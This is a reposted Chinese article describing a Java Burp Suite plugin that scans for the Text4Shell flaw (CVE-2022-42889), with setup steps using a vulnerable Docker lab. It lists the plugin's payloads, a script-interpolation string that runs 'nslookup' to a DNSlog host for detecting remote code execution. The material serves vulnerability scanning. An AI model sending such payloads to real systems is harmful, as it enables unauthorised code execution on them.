0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

Text4Shell的burp被动扫描插件

jf_Fo0qk3ln 来源:菜鸟学信安 2023-10-12 17:15 次阅读
项目地址:https://github.com/A0WaQ4/BurpText4ShellScan
简介

使用java编写的Text4shell burp被动扫描插件

java maven项目,可以使用mvn package进行编译

更新

1.0 - 首次上传,对所有经过burp的包进行被动扫描,扫描对象包括了jsonxmlfileupload
1.1 - 修复了body为空时导致的检测错误,修复了对URL参数不检测的错误
1.2 - 修复了body仅有json与xml时出现的参数构造错误,修复了dns二次检测时未获取key导致的错误
1.3 - 添加了主动扫描功能
1.4 - 添加了header黑名单功能,可以在resources/config.yml中修改

payload

- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"

可以在resources/config.yml修改

使用

1. 搭建环境

使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建环境

095b6812-68d7-11ee-939d-92fbcf53809c.png

2.插件

代理访问http://yourip:80/text4shell/attack?search=aaa,开始扫描

在logger中可看见插件发送的包

09685996-68d7-11ee-939d-92fbcf53809c.png

仅对是否可以dnslog进行扫描,若dnslog接受到请求,则爆出漏洞

0978639a-68d7-11ee-939d-92fbcf53809c.png

098a0942-68d7-11ee-939d-92fbcf53809c.png

3. 配置

在resources/config.yml中的dnsLogModule修改dnslog配置,使用时可以修改为自搭建的DnsLog服务器

0994ac9e-68d7-11ee-939d-92fbcf53809c.png

免责声明

该工具仅用于安全自查检测,由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9151

    浏览量

    85407
  • JAVA
    +关注

    关注

    19

    文章

    2967

    浏览量

    104743
  • GitHub
    +关注

    关注

    3

    文章

    471

    浏览量

    16436

原文标题:Text4Shell的burp被动扫描插件

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    shell是什么?shell实现原理分析基于MM32 MCU的shell脚本源码

    在前两节中,我们讲解了如何在MM32 MCU上使用shell来辅助开发,分别介绍的是通过串口方式和J-Link RTT方式的shell,本次课程我们分析源码来讲解shell实现原理。 软件资源如下
    发表于 12-02 15:58 2502次阅读

    了解鸿蒙OS Text组件

    文本(Text)是用来显示字符串的组件,在界面上显示为一块文本区域。Text 作为一个基本组件,有很多扩展,常见的有按钮组件 Button,文本编辑组件 TextField。 使用 Text 创建
    的头像 发表于 01-29 15:24 1223次阅读
    了解鸿蒙OS <b class='flag-5'>Text</b>组件

    shell编程之shell是什么

    reminder that the file contains special text called a shell script.chmod 0755 myfile.sh
    发表于 11-26 16:00

    Linux Shell系列教程之Shell while循环及特点

    循环处理时,COUNTER加1,直到COUNT为5后终止。  输出:  1  2  3  4  5  例子2:  #!/bin/bash  while read text  do  echo
    发表于 09-04 15:21

    在RN4020,中央或观察员角色执行主动扫描还是被动扫描

    在RN4020,中央或观察员角色执行“主动”扫描还是“被动扫描”?也就是说,RN4020在扫描时发送,还是只接收广播/广告?我读过一些BLE模块发送
    发表于 05-07 08:21

    一些接插件被动元器件的3D模型

    一些接插件,电阻,电解电容,三极管等被动元器件的3D模型,有需要的拿走
    发表于 11-10 11:17

    UNIX[1].shell范例精解(第4版)_code

    电子发烧友网站提供《UNIX[1].shell范例精解(第4版)_code.txt》资料免费下载
    发表于 04-23 20:57 0次下载

    [Shell脚本专家指南]人民邮电出版社.扫描

    电子发烧友网站提供《[Shell脚本专家指南]人民邮电出版社.扫描版.txt》资料免费下载
    发表于 02-06 16:46 0次下载

    免安装代码编辑器Sublime Text3已经安装好各种功能插件应用程序

    本文档的主要内容详细介绍的是免安装代码编辑器Sublime Text3已经安装好各种功能插件应用程序免费下载。
    发表于 03-27 08:00 29次下载
    免安装代码编辑器Sublime <b class='flag-5'>Text</b>3已经安装好各种功能<b class='flag-5'>插件</b>应用程序

    Linux中shell脚本执的4种方式

    Linux中shell脚本的执行通常有4种方式,分别为工作目录执行,绝对路径执行,sh执行,shell环境执行。
    发表于 05-23 09:28 919次阅读
    Linux中<b class='flag-5'>shell</b>脚本执的<b class='flag-5'>4</b>种方式

    FOFA联动XRAY小工具:XRAY-F

    代理到Burp然后Burp再代理到Xray这样既可以联动Burp插件如Shiro,FastJson插件也可以使用
    的头像 发表于 10-26 10:25 896次阅读

    【Tools】被动扫描工具EPScan

    被动收集资产并自动进行SQL注入检测(插件化 自动Bypass)、XSS检测、RCE检测、敏感信息检测。
    的头像 发表于 12-05 10:47 845次阅读

    shell脚本基础知识汇总4

    Shell 编程跟 JavaScript、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。 Linux 的 Shell 种类众多,常见的有:
    的头像 发表于 02-15 10:49 666次阅读

    BurpSuite多功能辅助插件配置介绍

    介绍 knife是一个BurpSuite插件,主要目的是对Burp做一些小的改进,让使用更方便。就像用一把小刀对Burp进行小小的雕刻,故名“knife”。 注意事项 使用插件前,请先
    的头像 发表于 05-18 14:45 1551次阅读
    BurpSuite多功能辅助<b class='flag-5'>插件</b>配置介绍

    Sublime Text 4 Build 4169文本编辑器的新功能

    Sublime Text 4 Build 4169 带来了改进的语法高亮、易于选择字体、增量索引排序以及其他功能。
    的头像 发表于 12-03 11:12 1030次阅读
    Sublime <b class='flag-5'>Text</b> <b class='flag-5'>4</b> Build 4169文本编辑器的新功能